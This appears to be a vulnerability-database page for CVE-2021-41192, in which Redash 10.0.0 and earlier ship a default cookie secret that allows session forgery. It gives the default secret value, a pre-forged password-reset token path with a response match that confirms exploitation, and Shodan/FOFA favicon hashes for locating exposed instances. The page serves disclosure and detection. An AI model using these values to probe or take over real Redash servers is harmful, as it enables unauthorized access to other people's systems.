cbcvebase.
CVE-2021-41192
published 2021-11-24

CVE-2021-41192: Redash is a package for data visualization and sharing. If an admin sets up Redash versions 10.0.0 and prior without explicitly specifying the…

PriorityP350medium6.5CVSS 3.1
AVNACLPRLUINSUCNIHAN
EXPLOIT
EPSS
8.02%
94.0th percentile
Redash is a package for data visualization and sharing. If an admin sets up Redash versions 10.0.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. This issue only affects installations where the `REDASH_COOKIE_SECRET or REDASH_SECRET_KEY` environment variables have not been explicitly set. This issue does not affect users of the official Redash cloud images, Redash's Digital Ocean marketplace droplets, or the scripts in the `getredash/setup` repository. These instances automatically generate unique secret keys during installation. One can verify whether one's instance is affected by checking the value of the `REDASH_COOKIE_SECRET` environment variable. If it is `c292a0a3aa32397cdb050e233733900f`, should follow the steps to secure the instance, outlined in the GitHub Security Advisory.

Affected

2 ranges
VendorProductVersion rangeFixed in
getredashredash<= 10.0.0
redashredash<= 10.0.0

Detection & IOCsextracted from sources · hover to see the quote

url/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs
url/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs
othershodan:http.favicon.hash:698624197
otherfofa:icon_hash=698624197
  • Probe for vulnerable Redash instances by requesting the known default-secret-forged password-reset token path and checking the response body for 'Enter your new password:' and 'redash' with HTTP 200 status.
  • Match response body containing both 'Enter your new password:' and 'redash' with HTTP 200 to confirm exploitation of the default cookie secret.
  • Identify exposed Redash instances via Shodan favicon hash 698624197 or FOFA icon_hash=698624197 for targeting.
  • Check the REDASH_COOKIE_SECRET environment variable on any Redash installation; if it equals 'c292a0a3aa32397cdb050e233733900f', the instance is vulnerable to session forgery.
  • ·The vulnerability only affects Redash installations where REDASH_COOKIE_SECRET or REDASH_SECRET_KEY were never explicitly set; official cloud images, Digital Ocean marketplace droplets, and getredash/setup scripts auto-generate unique keys and are NOT affected.
  • ·The default secret value 'c292a0a3aa32397cdb050e233733900f' is shared across ALL vulnerable installations, enabling an attacker to forge valid session cookies for any unpatched instance.

CVSS provenance

nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.